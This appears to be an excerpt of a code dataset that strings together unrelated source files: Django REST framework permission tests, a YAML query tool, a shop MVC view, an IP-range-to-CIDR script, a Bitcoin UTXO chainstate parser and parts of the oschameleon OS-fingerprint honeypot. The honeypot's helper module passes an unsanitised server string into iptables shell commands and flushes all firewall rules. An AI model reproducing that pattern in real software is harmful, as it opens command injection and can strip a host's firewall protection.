user = User.objects.create_user('permitted', '<EMAIL>', 'password')
user.user_permissions = [
Permission.objects.get(codename='add_basicmodel'),
Permission.objects.get(codename='change_basicmodel'),
Permission.objects.get(codename='delete_basicmodel')
]
user = User.objects.create_user('updateonly', '<EMAIL>', 'password')
user.user_permissions = [
Permission.objects.get(codename='change_basicmodel'),
]
self.permitted_credentials = basic_auth_header('permitted', 'password')
self.disallowed_credentials = basic_auth_header('disallowed', 'password')
self.updateonly_credentials = basic_auth_header('updateonly', 'password')
BasicModel(text='foo').save()
def test_has_create_permissions(self):
request = factory.post('/', json.dumps({'text': 'foobar'}),
content_type='application/json',
HTTP_AUTHORIZATION=self.permitted_credentials)
response = root_view(request, pk=1)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_has_put_permissions(self):
request = factory.put('/1', json.dumps({'text': 'foobar'}),
content_type='application/json',
HTTP_AUTHORIZATION=self.permitted_credentials)
response = instance_view(request, pk='1')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_has_delete_permissions(self):
request = factory.delete('/1', HTTP_AUTHORIZATION=self.permitted_credentials)
response = instance_view(request, pk=1)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_does_not_have_create_permissions(self):
request = factory.post('/', json.dumps({'text': 'foobar'}),
content_type='application/json',
HTTP_AUTHORIZATION=self.disallowed_credentials)
response = root_view(request, pk=1)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_does_not_have_put_permissions(self):
request = factory.put('/1', json.dumps({'text': 'foobar'}),
content_type='application/json',
HTTP_AUTHORIZATION=self.disallowed_credentials)
response = instance_view(request, pk='1')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_does_not_have_delete_permissions(self):
request = factory.delete('/1', HTTP_AUTHORIZATION=self.disallowed_credentials)
response = instance_view(request, pk=1)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_has_put_as_create_permissions(self):
# User only has update permissions - should be able to update an entity.
request = factory.put('/1', json.dumps({'text': 'foobar'}),
content_type='application/json',
HTTP_AUTHORIZATION=self.updateonly_credentials)
response = instance_view(request, pk='1')
self.assertEqual(response.status_code, status.HTTP_200_OK)
# But if PUTing to a new entity, permission should be denied.
request = factory.put('/2', json.dumps({'text': 'foobar'}),
content_type='application/json',
HTTP_AUTHORIZATION=self.updateonly_credentials)
response = instance_view(request, pk='2')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_options_permitted(self):
request = factory.options('/', content_type='application/json',
HTTP_AUTHORIZATION=self.permitted_credentials)
response = root_view(request, pk='1')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertIn('actions', response.data)
self.assertEqual(list(response.data['actions'].keys()), ['POST'])
request = factory.options('/1', content_type='application/json',
HTTP_AUTHORIZATION=self.permitted_credentials)
response = instance_view(request, pk='1')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertIn('actions', response.data)
self.assertEqual(list(response.data['actions'].keys()), ['PUT'])
def test_options_disallowed(self):
request = factory.options('/', content_type='application/json',
HTTP_AUTHORIZATION=self.disallowed_credentials)
response = root_view(request, pk='1')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertNotIn('actions', response.data)
request = factory.options('/1', content_type='application/json',
HTTP_AUTHORIZATION=self.disallowed_credentials)
response = instance_view(request, pk='1')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertNotIn('actions', response.data)
def test_options_updateonly(self):
request = factory.options('/', content_type='application/json',
HTTP_AUTHORIZATION=self.updateonly_credentials)
response = root_view(request, pk='1')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertNotIn('actions', response.data)
request = factory.options('/1', content_type='application/json',
HTTP_AUTHORIZATION=self.updateonly_credentials)
response = instance_view(request, pk='1')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertIn('actions', response.data)
self.assertEqual(list(response.data['actions'].keys()), ['PUT'])
class OwnerModel(models.Model):
text = models.CharField(max_length=100)
owner = models.ForeignKey(User)
class IsOwnerPermission(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
return request.user == obj.owner
class OwnerInstanceView(generics.RetrieveUpdateDestroyAPIView):
model = OwnerModel
authentication_classes = [authentication.BasicAuthentication]
permission_classes = [IsOwnerPermission]
owner_instance_view = OwnerInstanceView.as_view()
class ObjectPermissionsIntegrationTests(TestCase):
"""
Integration tests for the object level permissions API.
"""
def setUp(self):
User.objects.create_user('not_owner', '<EMAIL>', 'password')
user = User.objects.create_user('owner', '<EMAIL>', 'password')
self.not_owner_credentials = basic_auth_header('not_owner', 'password')
self.owner_credentials = basic_auth_header('owner', 'password')
OwnerModel(text='foo', owner=user).save()
def test_owner_has_delete_permissions(self):
request = factory.delete('/1', HTTP_AUTHORIZATION=self.owner_credentials)
response = owner_instance_view(request, pk='1')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_non_owner_does_not_have_delete_permissions(self):
request = factory.delete('/1', HTTP_AUTHORIZATION=self.not_owner_credentials)
response = owner_instance_view(request, pk='1')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
``` |
{
"source": "0x656b694d/qyaml",
"score": 3
} |
#### File: src/qyaml/qyaml.py
```python
import sys
from types import NoneType
import yaml
import re
from typing import Any, Generator, Tuple
def parse(docs, *queries):
result, errors = [], []
for doc in yaml.safe_load_all(docs):
for query in queries:
for query_doc in yaml.safe_load_all(query):
for ok, value in do_query(doc, query_doc):
(result if ok else errors).append(value)
return result, errors if queries and (result or errors) else [(False, queries)]
ResultGenerator = Generator[Tuple[bool, Any], NoneType, NoneType]
def matchfunc(doc, query) -> ResultGenerator:
"""
>>> [*matchfunc('abc', 'a.c')]
[(True, 'abc')]
>>> [*matchfunc('abc', 'a.')]
[(False, 'a.')]
"""
yield (True, doc) if re.fullmatch(query, doc) else (False, query)
def eq(doc, query) -> ResultGenerator:
"""
>>> [*eq(13, 13)]
[(True, 13)]
>>> [*eq('abc', 'ab.')]
[(False, 'ab.')]
"""
yield (True, doc) if query == doc else (False, query)
def dict_str(doc: dict, query: str) -> ResultGenerator:
"""
>>> [*dict_str({'key1': 'value1', 'key2': 'value2'}, 'key.')]
[(True, {'key1': 'value1'}), (True, {'key2': 'value2'})]
>>> [*dict_str({'key1': 'value1', 'key2': 'value2'}, 'key2')]
[(True, {'key2': 'value2'})]
>>> [*dict_str({'key1': 'value1', 'key2': 'value2'}, 'key3')]
[(False, 'key3')]
"""
keys = filter(lambda k: re.fullmatch(query, k), doc.keys())
found = False
for k in keys:
found = True
yield (True, {k: doc[k]})
if not found:
yield (False, query)
def dict_bool(doc: dict, query: bool) -> ResultGenerator:
"""
>>> [*dict_bool({'key1': 'value1', 'key2': 'value2'}, True)]
[(True, {'key1': 'value1'}), (True, {'key2': 'value2'})]
>>> [*dict_bool({'key1': 'value1', 'key2': 'value2'}, False)]
[(True, 'key1'), (True, 'key2')]
"""
if query:
for k, v in doc.items():
yield (True, {k: v})
else:
for k in doc.keys():
yield (True, k)
def list_str(doc: list, query: str) -> ResultGenerator:
"""
>>> [*list_str(['abc', 'def'], 'abc')]
[(True, 'abc')]
>>> [*list_str(['abc', 73], 73)]
[(True, 73)]
>>> [*list_str(['abc', {'abc': 'def'}], 'abc')]
[(True, 'abc'), (True, {'abc': 'def'})]
>>> [*list_str(['abc', {'abc': 'def'}], 'def')]
[(False, 'def')]
"""
found = False
for d in doc:
for ok, x in do_query(d, query):
if ok:
yield (True, x)
found = True
if not found:
yield (False, query)
def list_list(doc: list, query: list) -> ResultGenerator:
"""
>>> [*list_list([1,2,3], [1,2,3])]
[(True, [1]), (True, [2]), (True, [3])]
>>> [*list_list([1,2,3], [1,2,5])]
[(True, [1]), (True, [2]), (False, 5)]
>>> [*list_list([1,2,3], [5])]
[(False, 5)]
>>> [*list_list([{'key': 'value'}], ['key'])]
[(True, [{'key': 'value'}])]
"""
found = set()
for d in doc:
result = []
for i, q in enumerate(query):
for ok, x in do_query(d, q):
if ok:
found.add(i)
result.append(x)
if len(result):
yield (True, result)
yield from ((False, query[i]) for i in range(len(query)) if not i in found)
def str_list(doc: str, query: list) -> ResultGenerator:
"""
>>> [*str_list('abcde', [1, 2, 3])]
[(True, 'b'), (True, 'c'), (True, 'd')]
"""
for q in query:
yield from do_query(doc, q)
def dict_dict(doc: dict, query: dict) -> ResultGenerator:
"""
>>> [*dict_dict({'key1': 'value1', 'key2': 'value2'},
... {'key1': 'value1', 'key2': 'value3'})]
[(True, {'key1': 'value1'}), (False, {'key2': 'value3'})]
>>> [*dict_dict({'key1': {'value1': 'value2'}},
... {'key.': 'value1'})]
[(True, {'key1': {'value1': 'value2'}})]
"""
for k, v in query.items():
keys = filter(lambda kk: re.fullmatch(k, kk)
if type(k) == str else k, doc.keys())
for dk in keys:
result = {}
for ok, x in do_query(doc.get(dk), v):
if ok:
if dk in result:
yield (True, result)
result = {}
result[dk] = x
else:
yield (False, {dk: v})
if result:
yield (True, result)
def dok_list(doc, query: list):
for q in query:
yield from dok_scalar(doc, q)
def dok_scalar(doc, query):
return (ok for ok, _ in do_query(doc, query))
def dok(doc, query):
yield from (dok_list if type(query) == list else dok_scalar)(doc, query)
def list_dict(doc: list, query: dict) -> ResultGenerator:
"""
>>> [*list_dict(['one', 'two', 'three'], {True: '.*e'})]
[(True, 'one'), (True, 'three')]
>>> [*list_dict(['one', 'two', 'three'], {True: '.*e', 0: 'one'})]
[(True, 'one'), (False, {True: '.*e', 0: 'one'}), (False, {True: '.*e', 0: 'one'})]
"""
f = {}
for k, v in query.items():
if type(k) == bool:
f[k] = v
if (not k) in f:
break
for i, d in enumerate(doc):
if True in f and not all(dok(d, f[True])) or False in f and any(dok(d, f[False])):
continue
only_bool = True
for k, v in query.items():
if type(k) == bool:
continue
only_bool = False
if type(k) == int and k == i:
yield from ((True, x) for ok, x in do_query(d, v) if ok)
if only_bool:
yield (True, d)
else:
yield from do_query(d, query)
def dict_list(doc: dict, query: list) -> ResultGenerator:
"""
>>> [*dict_list({'key1': 'value1', 'key2': {'key22': 'value2'}}, ['key1', {'key2': 'key22'}, 'key3'])]
[(True, {'key1': 'value1'}), (True, {'key2': {'key22': 'value2'}}), (False, 'key3')]
>>> [*dict_list({'key1': 'value1', 'key2': {'key22': 'value2'}}, ['key.'])]
[(True, {'key1': 'value1'}), (True, {'key2': {'key22': 'value2'}})]
"""
found = set()
for i, q in enumerate(query):
for ok, x in do_query(doc, q):
if ok:
found.add(i)
yield (True, x)
else:
break
else:
continue
break
yield from ((False, query[i]) for i in range(len(query)) if not i in found)
def x_index(doc, query) -> ResultGenerator:
yield (True, doc[query]) if 0 <= query < len(doc) else (False, query)
def x_key(doc, query) -> ResultGenerator:
yield (True, {query: doc[query]}) if query in doc else (False, query)
MATCHING_RULES: dict[str, dict[str, ResultGenerator]] = {
None: {None: eq},
str: {str: matchfunc, int: x_index, list: str_list},
int: {int: eq, float: eq},
float: {int: eq, float: eq},
bool: {bool: eq},
list: {str: list_str, int: x_index, float: x_index, list: list_list, dict: list_dict},
dict: {str: dict_str, int: x_key, float: x_key,
bool: dict_bool, list: dict_list, dict: dict_dict}
}
def do_query(doc, query):
rule = MATCHING_RULES.get(type(doc))
while rule is not None:
rule = rule.get(type(query))
if rule is not None:
yield from rule(doc, query)
break
else:
yield (False, query)
def print_results(results):
r, err = results
if len(r):
yaml.safe_dump(r, stream=sys.stdout, canonical=False)
return len(err) == 0
``` |
{
"source": "0x66you/supplyMVC-fwk",
"score": 3
} |
#### File: 0x66you/supplyMVC-fwk/view.py
```python
from model import Product
class InputView:
def enter_info(self):
print('[InputView]')
id_ = int(input('Product ID: '))
name_ = input('Name: ')
price_ = float(input('Price: '))
quantity_ = int(input("Quantity: "))
date_ = input('Date Added: ')
return id_, name_, price_, quantity_, date_
def enter_id_search(self):
id_ = int(input('[InputView]\nSearch ID number: '))
return id_
def enter_delete_alldb(self):
while True:
d = input('Delete ALL data in db?(y/n)\n')
if d.lower() == 'y':
return True
elif d.lower() == 'n':
return False
else:
print('[error] Number invalid..')
def enter_delete_id(self):
num_ = int(input('[InputView]\nEnter ID (to be deleted): '))
return num_
def enter_update_id(self):
print('[InputView]')
id_ = int(input('Product ID(to be updated): '))
price_ = float(input('Update Price (BLANK if unchanged): '))
quantity_ = int(input('Update Quantity (BLANK if unchanged): '))
return id_, price_, quantity_
class OutputView:
def show_all(self, product_list: list):
for product in product_list:
p_ = Product(product[0], product[1], product[2], product[3], product[4])
print(p_)
def show_id_search(self, product_list: list):
print('[OutputView] Id search..')
if product_list:
p_ = Product(product_list[0][0], product_list[0][1], product_list[0][2], product_list[0][3],
product_list[0][4])
print(p_)
return True
else:
print('No Match..')
return False
def show_delete_alldb(self, confirm_):
print('[OutputView] Delete all in db..')
if confirm_:
print("Successful..")
else:
print("Delete failed (nothing in db)..")
def show_cancel_delete(self):
print('[OutputView]')
print('Delete cancelled')
def show_delete_id(self, confirm_):
print('[OutputView] Delete id in db..')
if confirm_:
print("Delete successful..")
else:
print("Id not in db..")
def show_update_id(self, confirm_):
print('[OutputView] Update id in db..')
if confirm_:
print("Update successful..")
else:
print("Update unsuccessful(no input values)")
class MenuView:
def __init__(self):
self.choice = None
self.choose_execute = 1
self.choose_search_alldb = 2
self.choose_search_id = 3
self.choose_delete_alldb = 4
self.choose_delete_id = 5
self.choose_update_id = 6
self.choose_end = 9
def nav(self):
s = '''\n[ShopMenu]
⑴ Add New
⑵ Return Everything
⑶ Search by ID
⑷ Delete Everything
⑸ Delete by ID
⑹ Update Price, Quantity
⑼ Exit
➤➤ '''
self.choice = int(input(s))
``` |
{
"source": "0x680/netblock-enumerator",
"score": 3
} |
#### File: 0x680/netblock-enumerator/range2cidr.py
```python
import netaddr
import argparse
import re
import sys
parser = argparse.ArgumentParser(
description='Takes txt file as input containing ranges in the form "0.0.0.0 - 1.1.1.1" (one per line), converts to CIDR notation, and outputs to another txt file')
parser.add_argument(
"-i",
required=True,
dest="infile",
help="Input file")
parser.add_argument(
"-o",
required=False,
dest="outfile",
help="Output file")
args = parser.parse_args()
def main():
try:
infile = args.infile
complete = []
with open(infile, 'r') as f:
lines = f.readlines()
for range in lines:
start_ip = range.split('-', 1)[0]
range_end = range.split('-', 1)[1]
end_ip = range_end.strip('\n')
complete.append(netaddr.iprange_to_cidrs(start_ip, end_ip))
pattern = re.compile(r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}(?:/\d{1,2}|)")
compressed = ' '.join([str(elem) for elem in complete])
result = re.findall(pattern, compressed)
return '\n'.join(result)
except:
print('Something went wrong, check input file contains ranges in the form "0.0.0.0 - 1.1.1.1", one per line.')
sys.exit(-1)
def write_output():
if args.outfile:
try:
outfile = open(args.outfile, "wt")
outfile.write(main())
outfile.close()
except:
pass
if __name__ == '__main__':
print(main())
write_output()
``` |
{
"source": "0x6b656e/utxo-dump",
"score": 2
} |
#### File: utxo-dump/utxo/chainstate.py
```python
import b128
import itertools
import os
import plyvel
import secp256k1
from binascii import unhexlify
from utxo.script import OP_DUP, OP_HASH160, OP_EQUAL, \
OP_EQUALVERIFY, OP_CHECKSIG
def ldb_iter(datadir):
db = plyvel.DB(os.path.join(datadir, "chainstate"), compression=None)
obf_key = db.get((unhexlify("0e00") + "obfuscate_key"))
if obf_key is not None:
pre = 'C'
obf_key = map(ord, obf_key[1:])
else:
pre = 'c'
def norm(raw):
key, value = raw
if obf_key is not None:
value = deobfuscate(obf_key, value)
return parse_ldb_value(key, value)
else:
return parse_ldb_value_old(key, value)
it = db.iterator(prefix=pre)
it = itertools.imap(norm, it)
if obf_key is None:
it = itertools.chain.from_iterable(it)
return it
def parse_ldb_value(key, raw):
tx_hash = key[1:33]
index = b128.parse(key[33:])[0]
code, raw = b128.read(raw)
height = code >> 1
amt_comp, raw = b128.read(raw)
amt = b128.decompress_amount(amt_comp)
script_code, raw = b128.read(raw)
script = decompress_raw(script_code, raw)[0]
return tx_hash, height, index, amt, script
def parse_ldb_value_old(key, raw):
tx_hash = key[1:]
version, raw = b128.read(raw)
code, raw = b128.read(raw)
first_two = (code & (2 | 4)) >> 1
n = (code >> 3) + (first_two == 0)
offset = 0
bitv = first_two
if n > 0:
while n:
n -= (ord(raw[offset]) != 0)
offset += 1
bitv = (int(raw[:offset][::-1].encode('hex'), 16) << 2) | first_two
raw = raw[offset:]
i = 0
utxos = []
while bitv > 0:
if bitv & 1:
amt_comp, raw = b128.read(raw)
amt = b128.decompress_amount(amt_comp)
script_code, raw = b128.read(raw)
script, raw = decompress_raw(script_code, raw, chomp=True)
ut = (tx_hash, None, i, amt, script)
utxos.append(ut)
bitv >>= 1
i += 1
height, raw = b128.read(raw)
assert len(raw) == 0
ret = [u[:1] + (height,) + u[2:] for u in utxos]
return ret
def decompress_raw(comp_type, raw, chomp=False):
if comp_type == 0 or comp_type == 1:
l = 20
elif comp_type >= 2 and comp_type <= 5:
l = 32
else:
l = comp_type - 6
data = raw[:l]
raw = raw[l:]
if not chomp:
assert len(raw) == 0
if comp_type == 0:
script = OP_DUP + OP_HASH160 + chr(20) + data + \
OP_EQUALVERIFY + OP_CHECKSIG
elif comp_type == 1:
script = OP_HASH160 + chr(20) + data + OP_EQUAL
elif comp_type == 2 or comp_type == 3:
script = chr(33) + chr(comp_type) + data + OP_CHECKSIG
elif comp_type == 4 or comp_type == 5:
comp_pubkey = chr(comp_type - 2) + data
pubkey = secp256k1.PublicKey(
comp_pubkey, raw=True
).serialize(compressed=False)
script = chr(65) + pubkey + OP_CHECKSIG
else:
script = data
return script, raw
def deobfuscate(key, obf):
n = len(key)
de = [chr(key[i % n] ^ ord(b)) for i, b in enumerate(obf)]
return "".join(de)
``` |
{
"source": "0x6d6f7468/oschameleon",
"score": 2
} |
#### File: oschameleon/oschameleon/root_fork.py
```python
import argparse
import gevent
import gevent.monkey
import grp
import os
import pwd
from osfuscation import OSFuscation
from stack_packet.helper import flush_tables
gevent.monkey.patch_all()
def root_process():
print("Child: Running as {0}/{1}.".format(pwd.getpwuid(os.getuid())[0], grp.getgrgid(os.getgid())[0]))
data = OSFuscation.run(args.template)
print('OSFuscation return value', data)
def drop_privileges(uid_name='nobody', gid_name='nogroup'):
print("Init: Running as {0}/{1}.".format(pwd.getpwuid(os.getuid())[0], grp.getgrgid(os.getgid())[0]))
wanted_uid = pwd.getpwnam(uid_name)[2]
wanted_gid = grp.getgrnam(gid_name)[2]
pid = gevent.fork()
# print "root_fork : drop_privil : pid ",pid
if pid == 0:
# child
print ('starting child process')
child_process = gevent.spawn(root_process)
child_process.join()
print ('Child done:', child_process.successful())
flush_tables()
print ('Child exit')
else:
# parent
os.setgid(wanted_gid)
os.setuid(wanted_uid)
new_uid_name = pwd.getpwuid(os.getuid())[0]
new_gid_name = grp.getgrgid(os.getgid())[0]
print("Parent: Privileges dropped, running as {0}/{1}.".format(new_uid_name, new_gid_name))
while True:
try:
gevent.sleep(1)
print ('Parent: ping')
except KeyboardInterrupt:
break
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='OSChameleon sample usage')
parser.add_argument('--template', metavar='template.txt', type=str, help='path to the fingerprint template')
args = parser.parse_args()
if args.template is None:
args.template = "template/SIMATIC_300_PLC.txt"
try:
drop_privileges()
except KeyboardInterrupt:
flush_tables()
print ("bye")
```
#### File: oschameleon/session/log.py
```python
import logging.handlers
import os
logger = logging.getLogger("oschameleon")
class Log(object):
def __init__(self, name):
self.setup(name)
def setup(self, name):
# self.remote_logging(name, server)
self.py_logging(name)
def folder_exist(self, path):
if not os.path.exists(path):
os.makedirs(path)
def remote_logging(self, name, server):
rootLogger = logging.getLogger('')
rootLogger.setLevel(logging.DEBUG)
print(server)
socketHandler = logging.handlers.SocketHandler(server, logging.handlers.DEFAULT_TCP_LOGGING_PORT)
# don't bother with a formatter, since a socket handler sends the event as
# an unformatted pickle
rootLogger.addHandler(socketHandler)
def py_logging(self, name):
# print("log", name)
path = "/var/log/honeypot/"
self.folder_exist(path)
logFile = path + name + ".log"
logger = logging.getLogger(name)
# formatter = logging.Formatter('%(asctime)s : %(message)s')
formatter = logging.Formatter('%(message)s')
fileHandler = logging.FileHandler(logFile, mode="a")
fileHandler.setFormatter(formatter)
logger.setLevel(logging.INFO)
logger.addHandler(fileHandler)
def info(self, message):
logger.info(message)
```
#### File: oschameleon/stack_packet/helper.py
```python
import nfqueue
import os
def flush_tables():
os.system('iptables -F')
def forward_packet(nfq_packet):
# send the packet from NFQUEUE without modification
nfq_packet.set_verdict(nfqueue.NF_ACCEPT)
def drop_packet(nfq_packet):
# drop the packet from NFQUEUE
nfq_packet.set_verdict(nfqueue.NF_DROP)
def rules(server):
# print server
# allow incoming ssh
os.system('iptables -A INPUT -p tcp -s' + server + ' --dport 63712 -m state --state NEW,ESTABLISHED -j ACCEPT')
os.system('iptables -A OUTPUT -p tcp -d' + server + ' --sport 63712 -m state --state ESTABLISHED -j ACCEPT')
# allow outgoing ssh
os.system('iptables -A OUTPUT -p tcp -d' + server + ' --sport 63712 -m state --state NEW,ESTABLISHED -j ACCEPT')
os.system('iptables -A INPUT -p tcp -s' + server + ' --dport 63712 -m state --state ESTABLISHED -j ACCEPT')
# Configure NFQUEUE target
# Capture incoming packets and put in nfqueue 1
os.system('iptables -A INPUT -j NFQUEUE --queue-num 0')
``` |
Subsets and Splits